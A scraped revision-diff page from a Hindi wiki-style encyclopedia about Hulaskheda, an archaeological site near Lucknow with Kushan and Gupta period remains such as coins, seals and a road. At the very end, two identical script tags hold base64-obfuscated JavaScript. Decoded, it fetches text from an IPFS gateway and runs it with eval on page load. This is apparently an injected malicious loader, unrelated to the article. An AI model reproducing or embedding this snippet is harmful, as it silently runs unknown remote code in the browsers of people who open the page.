Difference between revisions of "हुलासखेड़ा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "सिक़्क़े" to "सिक्के")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
*हुलासखेड़ा [[उत्तर प्रदेश]] में [[लखनऊ]] में स्थित है।  
 
*हुलासखेड़ा [[उत्तर प्रदेश]] में [[लखनऊ]] में स्थित है।  
*यहाँ से [[कुषाणकाल]] से [[गुप्तकाल]] तक के भौतिक अवशेष मिले है, जिनसे पता चलता हैं, कि पाँचवी शताब्दी ईस्वी तक हुलासखेड़ा एक नगर था।  
+
*यहाँ से [[कुषाण काल]] से [[गुप्तकाल]] तक के भौतिक अवशेष मिले है, जिनसे पता चलता हैं, कि पाँचवी शताब्दी ईस्वी तक हुलासखेड़ा एक नगर था।  
*यहाँ से प्राप्त कुषाणकालीन अवशेषों में सर्वाधिक महत्वपूर्ण 200 मीटर लम्बी सड़क, सुनियोजित जल निकासी-व्यवस्था, कार्तिकेय की स्वर्णप्रतिमा, चाँदी के आहत सिक्के और तीन कुषाण नरेशों के ताम्र सिक्के हैं।
+
*यहाँ से प्राप्त कुषाणकालीन अवशेषों में सर्वाधिक महत्त्वपूर्ण 200 मीटर लम्बी सड़क, सुनियोजित जल निकासी-व्यवस्था, कार्तिकेय की स्वर्णप्रतिमा, चाँदी के आहत सिक्के और तीन कुषाण नरेशों के ताम्र सिक्के हैं।
 
*हुलासखेड़ा से जो गुप्तकालीन अवशेष प्राप्त हुए है, उनमें दुर्ग के भग्नावशेष, ताँबे और चाँदी के सिक्के, गुप्तलिपि में लिखी कुछ मुहरें, हाथीदाँत की कंघी, मुहरछापे, 17 छड़ों वाली लोहे की अण्डाकार वस्तु इत्यादि प्रमुख हैं।  
 
*हुलासखेड़ा से जो गुप्तकालीन अवशेष प्राप्त हुए है, उनमें दुर्ग के भग्नावशेष, ताँबे और चाँदी के सिक्के, गुप्तलिपि में लिखी कुछ मुहरें, हाथीदाँत की कंघी, मुहरछापे, 17 छड़ों वाली लोहे की अण्डाकार वस्तु इत्यादि प्रमुख हैं।  
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
==संबंधित लेख==
 +
{{उत्तर प्रदेश के ऐतिहासिक स्थान}}
 +
{{उत्तर प्रदेश के पर्यटन स्थल}}
  
 
[[Category:उत्तर प्रदेश]][[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:उत्तर प्रदेश]][[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:04, 3 March 2013

  • hulasakhe da uttar pradesh mean lakhanoo mean sthit hai.
  • yahaan se kushan kal se guptakal tak ke bhautik avashesh mile hai, jinase pata chalata haian, ki paanchavi shatabdi eesvi tak hulasakhe da ek nagar tha.
  • yahaan se prapt kushanakalin avasheshoan mean sarvadhik mahattvapoorn 200 mitar lambi s dak, suniyojit jal nikasi-vyavastha, kartikey ki svarnapratima, chaandi ke ahat sikke aur tin kushan nareshoan ke tamr sikke haian.
  • hulasakhe da se jo guptakalin avashesh prapt hue hai, unamean durg ke bhagnavashesh, taanbe aur chaandi ke sikke, guptalipi mean likhi kuchh muharean, hathidaant ki kanghi, muharachhape, 17 chh doan vali lohe ki andakar vastu ityadi pramukh haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>